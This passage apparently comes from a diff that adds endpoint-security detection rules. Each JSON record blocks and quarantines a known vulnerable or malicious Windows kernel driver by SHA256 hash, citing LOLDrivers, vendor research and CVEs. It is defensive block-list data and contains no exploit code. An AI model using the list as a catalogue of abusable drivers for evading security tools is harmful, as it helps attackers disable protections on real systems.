+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978049Z",
+ "creation_date": "2026-03-23T11:45:29.978051Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978056Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae79e760c739d6214c1e314728a78a6cb6060cce206fde2440a69735d639a0a2",
+ "comment": "Vulnerable Kernel Driver (aka ni.sys) [https://www.loldrivers.io/drivers/4f93e19c-4600-4e2e-943f-a986875fd7d2/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dbb4e149-6270-5906-b001-ae376909d137",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475358Z",
+ "creation_date": "2026-03-23T11:45:30.475362Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475370Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3fb37ecca8742677bd94ef6f6fb195b4baac701525c2140773a6475fa3aa633c",
+ "comment": "Malicious Kernel Driver (aka ef0e1725aaf0c6c972593f860531a2ea.sys) [https://www.loldrivers.io/drivers/8c2df58f-1e02-4911-ad40-3fa4ed1f4333/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dbbd8cca-b1c7-598d-9f84-186ce5806b07",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979203Z",
+ "creation_date": "2026-03-23T11:45:29.979205Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a6db5febdaf3f1577bf97c6e1e24913e6c78b134062c02fd1f9875099c03a3f",
+ "comment": "Vulnerable Kernel Driver (aka nt2.sys) [https://www.loldrivers.io/drivers/cacc48e6-6ed8-431c-abee-88ee6c2dc3c1/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dbc0d456-803a-59c2-8e8e-cbc15f4b6267",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484330Z",
+ "creation_date": "2026-03-23T11:45:31.484333Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484342Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "86e323a7bfb49e25d7b87b9371bae05b55eee961f7601057bd4f3678334b4bb5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dbc1d65a-8a81-5995-8594-4009c1ae2d90",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620177Z",
+ "creation_date": "2026-03-23T11:45:29.620179Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620184Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "45abdbcd4c0916b7d9faaf1cd08543a3a5178871074628e0126a6eda890d26e0",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dbc37f56-f37f-59cb-950a-e7abdfdec53f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146204Z",
+ "creation_date": "2026-03-23T11:45:31.146206Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "175bfda05e5038f18daf8df0ace486fcad16d6e6412499e71db6e822ab2ea785",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dbc8516f-5048-5b3e-b974-b39568bf298c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478379Z",
+ "creation_date": "2026-03-23T11:45:31.478400Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478433Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c0cd6340e6726716c7f1c000e7b63fd8bca7e74102eb91edddcb4428bc1dd55b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dbd92e0f-8455-5320-a172-9c5fb1ba5840",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150772Z",
+ "creation_date": "2026-03-23T11:45:31.150774Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150780Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "698a74f3c3261d42ba900e1cb213036ec41164faffc39bc9de996243d86f0c33",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dbe6cea0-9b79-59e0-9603-9697a7af59e7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614839Z",
+ "creation_date": "2026-03-23T11:45:29.614841Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614846Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b7a20b5f15e1871b392782c46ebcc897929443d82073ee4dcb3874b6a5976b5d",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dbf1ebe6-8ea0-579c-abd4-8871b12abe54",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977442Z",
+ "creation_date": "2026-03-23T11:45:29.977445Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977454Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe",
+ "comment": "Vulnerable Kernel Driver (aka ProtectS.sys) [https://www.loldrivers.io/drivers/99668140-a8f6-48f8-86d1-cf3bf693600c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dbf2ab8a-aaf1-5151-8abc-ec5f2f6b6039",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608742Z",
+ "creation_date": "2026-03-23T11:45:29.608744Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608749Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cfad0d75d218ce160f7b7932e39ec4387d2245c3d72eb9d7cfbaa5198aa8cee3",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dc08399e-6e47-53de-8329-8afd6fe89621",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813297Z",
+ "creation_date": "2026-03-23T11:45:31.813300Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813308Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f749a9da70a5b74835bde3210e7388ab8a569dcd73b8d2377569348cd592f8d9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dc2b05a5-453d-5be7-a332-f8f54b5ce3ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829359Z",
+ "creation_date": "2026-03-23T11:45:31.829362Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829371Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89fbb4aff9cb0636ff3b732dcc7ce7972337b649212214c72d1172574e30c23e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dc2d5b44-3608-5aec-b5f0-7d30ade9837c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824276Z",
+ "creation_date": "2026-03-23T11:45:30.824278Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824284Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db0c85649cbf52afdb65c3d5c69357eb24c202ca1de35dc3dad7d75690823a5f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dc3d9437-4ffd-5383-8ff2-c194a175377b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476404Z",
+ "creation_date": "2026-03-23T11:45:31.476408Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476418Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bc5fa01c9a3885cbc0e6f4a798f487fbe77aa6c83770c0558f7f72fea7e46b35",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dc41c0c0-67a2-58ad-b54c-1b59f92c3398",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821962Z",
+ "creation_date": "2026-03-23T11:45:30.821964Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821970Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db58973c75b7cb94ffb31ad46fddf2f16f19075a99a69a7de20f8c0e42d96ba0",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dc427c68-8bd9-5d1f-8d4c-6bf8558bf02d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827980Z",
+ "creation_date": "2026-03-23T11:45:31.827983Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827988Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4a996a4b5d494f02a2e70a3cffe28f4ee9d5de7cf48f5363b662163165f4d31e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dc541a5e-a9e1-5f0d-8133-37ea1b045d26",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618907Z",
+ "creation_date": "2026-03-23T11:45:29.618909Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618915Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c349c8036b5ee61e7b0831943697ba98bfe70a52bac0a06b497c229b0c0fff27",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dc607bc5-ba62-5e5f-ba19-7d16421e9ee3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453519Z",
+ "creation_date": "2026-03-23T11:45:30.453523Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453532Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "75f1bea34e2bb1d26cf173eba44daeb9bbee8106d43b911a01f73f76be17a165",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dc612226-d7f3-5d7c-b364-f94b6571a046",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157136Z",
+ "creation_date": "2026-03-23T11:45:31.157138Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157143Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ae9800e70d6d3511f5e93204310d8d895827d81df2f27f0d662e7ac11bd47527",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dc706fe6-290e-564b-bdfe-5ca26b21bb54",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827362Z",
+ "creation_date": "2026-03-23T11:45:30.827364Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827370Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd2560bd492ed88f4822a7ce4cd8e4f47f2727895964edcd0f7fe5a419910cb3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dc71c3d9-04ba-5176-8338-01946c39af90",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970140Z",
+ "creation_date": "2026-03-23T11:45:29.970142Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970147Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "11f0f2395b3e7a9849bf3f050bfda6b48ae2de856d8541a16b51d9097afb8306",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "dc781622-d418-5abf-b731-3ff4bc61b109",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.496055Z",
